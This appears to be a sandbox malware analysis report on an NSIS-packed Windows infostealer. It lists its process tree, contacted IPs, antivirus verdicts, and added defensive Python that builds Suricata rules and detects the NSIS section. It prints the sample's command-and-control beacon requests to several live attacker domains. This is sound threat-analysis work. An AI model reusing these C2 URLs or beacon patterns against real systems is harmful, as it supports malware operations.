Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | Feb. 20, 2023, 6:27 p.m. | Feb. 20, 2023, 6:29 p.m. |
Process tree

Process | PID | Command line |
---|---|---|
sdfbyis.exe | 2136 | "C:\Users\test22\AppData\Local\Temp\sdfbyis.exe" C:\Users\test22\AppData\Local\Temp\wkzlayk.v |
sdfbyis.exe | 2208 | "C:\Users\test22\AppData\Local\Temp\sdfbyis.exe" |

The first instance is started with the dropped file wkzlayk.v as its only argument; the second instance runs the same binary from the same path with no argument.
IP Address | Status | Action |
---|---|---|
154.36.192.148 | Active | Moloch |
154.37.38.226 | Active | Moloch |
164.124.101.2 | Active | Moloch |
192.64.116.162 | Active | Moloch |
198.54.117.242 | Active | Moloch |
199.15.163.128 | Active | Moloch |
204.93.169.182 | Active | Moloch |
45.33.6.223 | Active | Moloch |
5.101.152.161 | Active | Moloch |
95.216.161.178 | Active | Moloch |
Suricata Alerts: none listed
Suricata TLS: none
Signatures

Indicator | Value |
---|---|
section | .ndata |
suspicious_features | GET method with no User-Agent header (suspicious_request: GET http://www.iidethakur.xyz/erh1/?em=RTH9mQA/n/TNXPfYm1IQ7kHa2Q5nsTC6kRfi+yFPN0Z6FU6dgArPOJWDHQBf5RE1GBDoONRo0qQWV1gcrPNWuxRml6P17NRo//cHjbw=&vxk=R4T_9gGjkVANzOLb) |
suspicious_features | GET method with no User-Agent header (suspicious_request: GET http://www.ectdamageoutlaytospe.xyz/erh1/?em=AHcw5OXb/Gm0OTCfDKZ3JK2DxYhw9RKBtUxAFBdta5MKTtGQWXSj63XVCvwVGfb92Yl3Ufjg0V67zzvooSJHcwgpn+BJcL90O6dhoL8=&vxk=R4T_9gGjkVANzOLb) |
suspicious_features | GET method with no User-Agent header (suspicious_request: GET http://www.chiyiqian.net/erh1/?em=8yvHrbMZKMPX4G7f9erTK5Qf9jc5QJU63StCeoHWCyVfdjdYM9jxH3fQGE5Iu7GP0O1mEzOAIrrJFf6p4gJURBs6dEGFAV/evzhFOwU=&vxk=R4T_9gGjkVANzOLb) |
suspicious_features | GET method with no User-Agent header (suspicious_request: GET http://www.botanica-online.ru/erh1/?em=do8xsgN913Pnny2aQ+UK0nDZkGlYRkt5zPJAoWdaBDk5pObX0g+xLOXXB+ddgWePhlrLLqA2L4+lJsdSAyHVXgmknCRuXBaZ2Yv2Mew=&vxk=R4T_9gGjkVANzOLb) |
suspicious_features | GET method with no User-Agent header (suspicious_request: GET http://www.bleclear.xyz/erh1/?em=Z0WuN7dkRWVSR17LZJVNMUwcuzExK0sMDp8JW5x4tCvk4vgayadIan3yifpjez9lQ/1VNOuDl27ov1rCEZ0+qWmIWB6a3zv1qxdGx5k=&vxk=R4T_9gGjkVANzOLb) |
suspicious_features | GET method with no User-Agent header (suspicious_request: GET http://www.fieldzerohealth.com/erh1/?em=2fftqGAYz6+U6LebbRvkYVCnpFDwwjkXc5V+lmDsVDhPAKcfcJvMu1TqUMUx5Sl5ugQ4b/H1oW7OweiN6k/YFLbPvlSp+kJlDYXlmiM=&vxk=R4T_9gGjkVANzOLb) |
suspicious_features | GET method with no User-Agent header (suspicious_request: GET http://www.nnhuigou.com/erh1/?em=zgUlILOmccKllncYZi7rpx3Dy3rd1czJYU7gexZDdnilDjeuG+4Wva/CQyP1Xrup3QMjHCP+/VcwhY9vPmUWjWt3CJ1rvTCIIXYKhA4=&vxk=R4T_9gGjkVANzOLb) |
request | GET http://www.iidethakur.xyz/erh1/?em=RTH9mQA/n/TNXPfYm1IQ7kHa2Q5nsTC6kRfi+yFPN0Z6FU6dgArPOJWDHQBf5RE1GBDoONRo0qQWV1gcrPNWuxRml6P17NRo//cHjbw=&vxk=R4T_9gGjkVANzOLb |
request | GET http://www.sqlite.org/2021/sqlite-dll-win32-x86-3360000.zip |
request | POST http://www.ectdamageoutlaytospe.xyz/erh1/ |
request | GET http://www.ectdamageoutlaytospe.xyz/erh1/?em=AHcw5OXb/Gm0OTCfDKZ3JK2DxYhw9RKBtUxAFBdta5MKTtGQWXSj63XVCvwVGfb92Yl3Ufjg0V67zzvooSJHcwgpn+BJcL90O6dhoL8=&vxk=R4T_9gGjkVANzOLb |
request | POST http://www.chiyiqian.net/erh1/ |
request | GET http://www.chiyiqian.net/erh1/?em=8yvHrbMZKMPX4G7f9erTK5Qf9jc5QJU63StCeoHWCyVfdjdYM9jxH3fQGE5Iu7GP0O1mEzOAIrrJFf6p4gJURBs6dEGFAV/evzhFOwU=&vxk=R4T_9gGjkVANzOLb |
request | POST http://www.botanica-online.ru/erh1/ |
request | GET http://www.botanica-online.ru/erh1/?em=do8xsgN913Pnny2aQ+UK0nDZkGlYRkt5zPJAoWdaBDk5pObX0g+xLOXXB+ddgWePhlrLLqA2L4+lJsdSAyHVXgmknCRuXBaZ2Yv2Mew=&vxk=R4T_9gGjkVANzOLb |
request | POST http://www.bleclear.xyz/erh1/ |
request | GET http://www.bleclear.xyz/erh1/?em=Z0WuN7dkRWVSR17LZJVNMUwcuzExK0sMDp8JW5x4tCvk4vgayadIan3yifpjez9lQ/1VNOuDl27ov1rCEZ0+qWmIWB6a3zv1qxdGx5k=&vxk=R4T_9gGjkVANzOLb |
request | POST http://www.fieldzerohealth.com/erh1/ |
request | GET http://www.fieldzerohealth.com/erh1/?em=2fftqGAYz6+U6LebbRvkYVCnpFDwwjkXc5V+lmDsVDhPAKcfcJvMu1TqUMUx5Sl5ugQ4b/H1oW7OweiN6k/YFLbPvlSp+kJlDYXlmiM=&vxk=R4T_9gGjkVANzOLb |
request | POST http://www.nnhuigou.com/erh1/ |
request | GET http://www.nnhuigou.com/erh1/?em=zgUlILOmccKllncYZi7rpx3Dy3rd1czJYU7gexZDdnilDjeuG+4Wva/CQyP1Xrup3QMjHCP+/VcwhY9vPmUWjWt3CJ1rvTCIIXYKhA4=&vxk=R4T_9gGjkVANzOLb |
request | POST http://www.kioro.net/erh1/ |
domain | www.botanica-online.ru (Russian Federation domain TLD) |
file | C:\Users\test22\AppData\Local\Temp\sdfbyis.exe |
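Every flagged GET above uses the same URI path (/erh1/), the same query layout (em=<blob>&vxk=<token>) and an identical vxk token across otherwise unrelated domains, and the POST requests, including the one to www.kioro.net that never received a GET, hit that same path. That shared path and token is the pivot that ties the contacted hosts together. The following Python is an added example, not code from the sandbox or from the report: it applies the report's own no-User-Agent heuristic to the request list, clusters hosts by path and vxk token to surface the pivot, and emits a Suricata rule for it. The request tuples are copied from the signature table; the User-Agent value on the www.sqlite.org download (the report does not show its headers) and the rule's sid are assumptions.

```python
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# (method, url, user_agent). Requests copied from the report's signature table.
# None = no User-Agent header; the sandbox flagged exactly the /erh1/ GETs for
# that. The User-Agent on the sqlite.org download is an assumption, since the
# report does not show that request's headers.
SAMPLE_REQUESTS = [
    ("GET", "http://www.iidethakur.xyz/erh1/?em=RTH9mQA/n/TNXPfYm1IQ7kHa2Q5nsTC6kRfi+yFPN0Z6FU6dgArPOJWDHQBf5RE1GBDoONRo0qQWV1gcrPNWuxRml6P17NRo//cHjbw=&vxk=R4T_9gGjkVANzOLb", None),
    ("GET", "http://www.sqlite.org/2021/sqlite-dll-win32-x86-3360000.zip", "Mozilla/5.0 (assumed)"),
    ("POST", "http://www.ectdamageoutlaytospe.xyz/erh1/", None),
    ("GET", "http://www.ectdamageoutlaytospe.xyz/erh1/?em=AHcw5OXb/Gm0OTCfDKZ3JK2DxYhw9RKBtUxAFBdta5MKTtGQWXSj63XVCvwVGfb92Yl3Ufjg0V67zzvooSJHcwgpn+BJcL90O6dhoL8=&vxk=R4T_9gGjkVANzOLb", None),
    ("POST", "http://www.chiyiqian.net/erh1/", None),
    ("GET", "http://www.chiyiqian.net/erh1/?em=8yvHrbMZKMPX4G7f9erTK5Qf9jc5QJU63StCeoHWCyVfdjdYM9jxH3fQGE5Iu7GP0O1mEzOAIrrJFf6p4gJURBs6dEGFAV/evzhFOwU=&vxk=R4T_9gGjkVANzOLb", None),
    ("POST", "http://www.botanica-online.ru/erh1/", None),
    ("GET", "http://www.botanica-online.ru/erh1/?em=do8xsgN913Pnny2aQ+UK0nDZkGlYRkt5zPJAoWdaBDk5pObX0g+xLOXXB+ddgWePhlrLLqA2L4+lJsdSAyHVXgmknCRuXBaZ2Yv2Mew=&vxk=R4T_9gGjkVANzOLb", None),
    ("POST", "http://www.bleclear.xyz/erh1/", None),
    ("GET", "http://www.bleclear.xyz/erh1/?em=Z0WuN7dkRWVSR17LZJVNMUwcuzExK0sMDp8JW5x4tCvk4vgayadIan3yifpjez9lQ/1VNOuDl27ov1rCEZ0+qWmIWB6a3zv1qxdGx5k=&vxk=R4T_9gGjkVANzOLb", None),
    ("POST", "http://www.fieldzerohealth.com/erh1/", None),
    ("GET", "http://www.fieldzerohealth.com/erh1/?em=2fftqGAYz6+U6LebbRvkYVCnpFDwwjkXc5V+lmDsVDhPAKcfcJvMu1TqUMUx5Sl5ugQ4b/H1oW7OweiN6k/YFLbPvlSp+kJlDYXlmiM=&vxk=R4T_9gGjkVANzOLb", None),
    ("POST", "http://www.nnhuigou.com/erh1/", None),
    ("GET", "http://www.nnhuigou.com/erh1/?em=zgUlILOmccKllncYZi7rpx3Dy3rd1czJYU7gexZDdnilDjeuG+4Wva/CQyP1Xrup3QMjHCP+/VcwhY9vPmUWjWt3CJ1rvTCIIXYKhA4=&vxk=R4T_9gGjkVANzOLb", None),
    ("POST", "http://www.kioro.net/erh1/", None),
]


def gets_without_user_agent(requests):
    """The sandbox's own heuristic: a GET request carrying no User-Agent header."""
    return [url for method, url, ua in requests if method == "GET" and not ua]


def cluster_by_path(requests):
    """Group contacted hosts by URI path and collect every vxk token seen on that path.

    The same path plus the same vxk token across many unrelated domains is what
    makes the list above read as one infrastructure set rather than seven sites.
    """
    clusters = defaultdict(lambda: {"hosts": set(), "vxk": set()})
    for _method, url, _ua in requests:
        parts = urlsplit(url)
        entry = clusters[parts.path]
        entry["hosts"].add(parts.hostname)
        # parse_qs returns {} for a bare POST URL with no query string
        entry["vxk"].update(parse_qs(parts.query).get("vxk", []))
    return clusters


def campaign_pivots(requests, min_hosts=3):
    """Return (path, vxk) pairs seen on at least min_hosts distinct hosts."""
    return sorted(
        (path, token)
        for path, entry in cluster_by_path(requests).items()
        for token in entry["vxk"]
        if len(entry["hosts"]) >= min_hosts
    )


def suricata_rule(path, vxk, sid):
    """Express a pivot as a Suricata rule (Suricata 5+ sticky-buffer syntax).

    The absent User-Agent is written as a negated match on http.header_names.
    The sid is an assumption; pick one from your local range.
    """
    return (
        "alert http $HOME_NET any -> $EXTERNAL_NET any ("
        f'msg:"Beacon GET {path} without User-Agent, vxk={vxk}"; '
        'flow:established,to_server; http.method; content:"GET"; '
        f'http.uri; content:"{path}?em="; startswith; content:"&vxk={vxk}"; '
        'http.header_names; content:!"User-Agent"; '
        f"classtype:trojan-activity; sid:{sid}; rev:1;)"
    )


if __name__ == "__main__":
    for url in gets_without_user_agent(SAMPLE_REQUESTS):
        print("no User-Agent:", url[:60], "...")
    for path, token in campaign_pivots(SAMPLE_REQUESTS):
        hosts = sorted(cluster_by_path(SAMPLE_REQUESTS)[path]["hosts"])
        print(f"pivot {path} vxk={token} on {len(hosts)} hosts: {hosts}")
        print(suricata_rule(path, token, sid=1000001))
```

Blocking on the vxk token alone is brittle (it is likely per-build or per-campaign), so pair the rule with the path prefix and the missing User-Agent, as above, and keep the contacted domains and the 10 resolved IPs from the network table as the block list.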
Antivirus results

Engine | Detection |
---|---|
MicroWorld-eScan | Trojan.NSISX.Spy.Gen.24 |
FireEye | Generic.mg.41cc45fca60b8167 |
VIPRE | Trojan.NSISX.Spy.Gen.24 |
Sangfor | Suspicious.Win32.Save.ins |
CrowdStrike | win/malicious_confidence_100% (D) |
Arcabit | Trojan.NSISX.Spy.Gen.24 |
Symantec | Packed.NSISPacker!g14 |
Elastic | malicious (high confidence) |
Cynet | Malicious (score: 100) |
APEX | Malicious |
Paloalto | generic.ml |
Kaspersky | UDS:DangerousObject.Multi.Generic |
BitDefender | Trojan.NSISX.Spy.Gen.24 |
Avast | Win32:PWSX-gen [Trj] |
Sophos | Generic ML PUA (PUA) |
F-Secure | Heuristic.HEUR/AGEN.1213060 |
McAfee-GW-Edition | BehavesLike.Win32.ICLoader.fc |
Trapmine | malicious.moderate.ml.score |
Emsisoft | Trojan.NSISX.Spy.Gen.24 (B) |
SentinelOne | Static AI - Suspicious PE |
Avira | HEUR/AGEN.1213060 |
Microsoft | Trojan:Win32/Sabsik.TE.B!ml |
ZoneAlarm | UDS:DangerousObject.Multi.Generic |
GData | Trojan.NSISX.Spy.Gen.24 |
AhnLab-V3 | Trojan/Win.Agent.C5382526 |
BitDefenderTheta | Gen:NN.ZexaF.36276.suW@a8PWqNki |
ALYac | Trojan.NSISX.Spy.Gen.24 |
MAX | malware (ai score=86) |
Ikarus | Trojan.Inject |
Fortinet | W32/Injector_AGen.PZ!tr |
AVG | Win32:PWSX-gen [Trj] |
Cybereason | malicious.4de436 |
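The .ndata section recorded in the signature table is the section NSIS-built installers carry, which is what the NSISX / NSISPacker verdicts above are keyed on; a sample that drops a second file (wkzlayk.v) and then relaunches itself fits that installer-as-wrapper pattern. The following Python is an added example, not code from the sandbox, the report or any vendor: it walks the PE headers by hand (no pefile dependency) to list section names and flag the NSIS section. Because the sample itself is not on the page, the build_pe_stub helper constructs a minimal header-only PE as test input; the scan_file helper is how you would run it against a real file.

```python
import struct

# Section name NSIS gives its installer stub (the report's "section | .ndata" row).
NSIS_SECTION = ".ndata"


def pe_section_names(data):
    """Return the section names of a PE image, parsed straight from the headers.

    Raises ValueError for anything that is not a PE, so a truncated or
    non-executable file is reported rather than silently passing as clean.
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]          # e_lfanew
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = pe_off + 4                                          # COFF file header
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]    # SizeOfOptionalHeader
    table = coff + 20 + opt_size                               # section table start
    names = []
    for i in range(num_sections):
        raw = data[table + 40 * i: table + 40 * i + 8]         # 8-byte Name field
        if len(raw) < 8:
            raise ValueError("section table truncated")
        names.append(raw.rstrip(b"\0").decode("ascii", "replace"))
    return names


def is_nsis_packed(data):
    """True when the image carries the NSIS installer section."""
    return NSIS_SECTION in pe_section_names(data)


def scan_file(path):
    """Triage helper for a sample on disk: (section names, NSIS flag)."""
    with open(path, "rb") as fh:
        data = fh.read()
    names = pe_section_names(data)
    return names, NSIS_SECTION in names


def build_pe_stub(section_names):
    """Construct a minimal, non-loadable PE consisting only of headers.

    Constructed test input standing in for the real sample: DOS header with
    e_lfanew, PE signature, COFF header with SizeOfOptionalHeader = 0, then one
    40-byte section header per name with everything but the name zeroed.
    """
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", 0x14C, len(section_names), 0, 0, 0, 0, 0x102)
    table = b"".join(n.encode().ljust(8, b"\0") + bytes(32) for n in section_names)
    return bytes(dos) + b"PE\0\0" + coff + table


if __name__ == "__main__":
    sample = build_pe_stub([".text", ".rdata", ".data", NSIS_SECTION, ".rsrc"])
    print("sections:", pe_section_names(sample))
    print("NSIS stub:", is_nsis_packed(sample))
```

The presence of .ndata on its own only says the file was built with NSIS, which plenty of legitimate installers are; it is the combination with the behaviour above (a dropped payload, a self-relaunch and beaconing GETs with no User-Agent) that turns the packer into a triage signal.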